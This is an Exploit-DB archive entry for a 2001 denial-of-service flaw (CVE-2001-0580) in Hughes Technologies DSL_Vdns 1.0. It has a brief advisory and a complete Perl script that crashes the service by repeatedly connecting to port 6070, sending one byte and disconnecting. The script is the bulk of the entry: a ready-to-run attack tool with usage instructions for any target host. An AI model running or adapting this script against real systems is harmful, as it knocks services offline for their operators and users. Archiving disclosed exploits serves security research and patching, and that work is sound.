Hughes Technologies DSL_Vdns 1.0 - Denial of Service

EDB-ID:

20827

CVE:

2001-0580

EDB Verified:

Author:

neme-dhc

Type:

dos

Exploit:   /  

Platform:

Multiple

Date:

2001-05-07

Vulnerable App: 
source: https://www.securityfocus.com/bid/2700/info

It is possible for a remote user to cause a denial of service on a host running DSL_Vdns. Submitting data to port 6070 and closing the connection before the request is fulfilled, will cause DSL_Vdns to enter a 'Default.Closed' state; therefore, refusing any new connections. 

#!/usr/bin/perl
#
# VDNS.PL - Crashes Virtual DNS Server 1.0
# Written by nemesystm of the DHC
# http://dhcorp.cjb.net - neme-dhc@hushmail.com
#
####
use Socket;

die "$0 - Stops Virtual DNS Server 1.0.
written by nemesystm of the DHC
http://dhcorp.cjb.net - neme-dhc\@hushmail.com
usage: perl $0 target.com\n" if !defined $ARGV[0];

for ($count = 0; $count <= 3; $count++) {
        $serverIP = inet_aton($ARGV[0]);
        $serverAddr = sockaddr_in(6070, $serverIP);
        socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
        if (connect (CLIENT, $serverAddr)) {
                send (CLIENT, "A", 0);
                close (CLIENT);
        } else { print ("if the number shown is 2, it worked"); die "Can't connect: $count\n"; }
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services